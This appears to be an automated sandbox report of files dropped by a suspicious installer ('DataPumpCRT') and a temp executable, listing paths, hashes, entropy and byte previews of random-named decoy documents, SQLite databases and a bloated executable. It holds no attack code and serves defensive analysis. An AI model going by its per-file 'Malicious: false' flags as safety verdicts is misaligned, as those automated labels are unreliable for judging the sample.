Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\stuff\is-CIAJQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\is-SCK02.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\tagsreplace.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	InnoSetup Log DataPumpCRT, version 0x30, 8046 bytes, 494126\user, "C:\Program Files (x86)\DataPumpCRT"
Category:	dropped
Size (bytes):	8046
Entropy (8bit):	5.0900383973664995
Encrypted:	false
SSDEEP:
MD5:	EB51DA3D3E71F872CDD4345D4162301B
SHA1:	4D7E9D0A4E9D4261E3E1D42575F38096CD58A140
SHA-256:	1F66B34D8FCCEFD55947ED4E0AE2A1B6CECFDFB48E15DBCC9FB44A2F697A1599
SHA-512:	CADAD13999CEC93537DB17A44791748C607AEAAEE7085B5A78AB49A38ACA700F23BF695293EBF4E0A6E003C7B91FABB85DCBA61FEB317E7D6977393D7F760BFC
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................DataPumpCRT.....................................................................................................................DataPumpCRT.....................................................................................................................0...B...n...%...............................................................................................................F...........q".$......B....494126.user"C:\Program Files (x86)\DataPumpCRT.............).M.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystem

C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	715038
Entropy (8bit):	6.505047376817153
Encrypted:	false
SSDEEP:
MD5:	BFA161AB7F837D65C7405ACA3AAFC240
SHA1:	6B1D618EF801B6135BF193A49F8749D0864CC390
SHA-256:	D2960019D9F83C67726BF9FDB864BDF24A57F9B66A7C4E3AEE77617D73EC883E
SHA-512:	9B33EBA0A642BB3EE9A8851E520D2CE281FA31015AAC2647584A7B2AB26837C65ADF1B031B81D557602545D46EF3F33FA1D5BE64809F25453F48BBA06ECEDB2D
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\ProgramData\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Reputation:	unknown
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\ProgramData\AIXACVYBSB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Reputation:	unknown
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\ProgramData\Bytematrix74\Bytematrix74.exe

Download File

Process:	C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	273342460
Entropy (8bit):	0.2152224945289245
Encrypted:	false
SSDEEP:
MD5:	A8F6256F7E6C68B81633AE38A46013CE
SHA1:	03CC6C49AA11D50650E7B2090820FCBE87A00AE8
SHA-256:	DBB04015141D2CBCDDD8A984FC2340F5E537D05DB87A3A8112C5E623221C787F
SHA-512:	38D5D35E6669B87D4E5644E62385629BED8444A5BBEDB5D2E941FAD689BC9DA28640DF6DF8E285421B581A3DAAC38B80CC3F47A6271C64AF7B2DB67A3BCB5161
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..#m..pm..pm..p..po..p..pn..p..pg..p..pf..p..po..pm..p...p..py..pm..pk..p..p@..p[.pl..p...pl..pRichm..p................PE..L....".e..................%.........&2$.......%...@..........................0K...............................................+.......2.8.............................................................................%.\............................text.....%.......%................. ..`.rdata...M....%..P....%.............@..@.data...DZ... +...... +.............@....rsrc...8.....2......02.............@..@.flang........;......@;.............`...........................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Reputation:	unknown
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\FBFCFIEBKEGHIDGCAFBFBFHDBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDBKJKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJEHJJDAAAKEBGCFCAAAAEHCB

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HQJBRDYKDE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691179545447335
Encrypted:	false
SSDEEP:
MD5:	70ED9F89ADEE0C43C2C82F30F075991E
SHA1:	0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
SHA-256:	4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
SHA-512:	A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
Malicious:	false
Reputation:	unknown
Preview:	HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

C:\ProgramData\HTAGVDFUIE.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\IEHCAKKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIEBGIDAAFHIJJJJEGCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBAECGCBKECAAAEBFBGHJJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
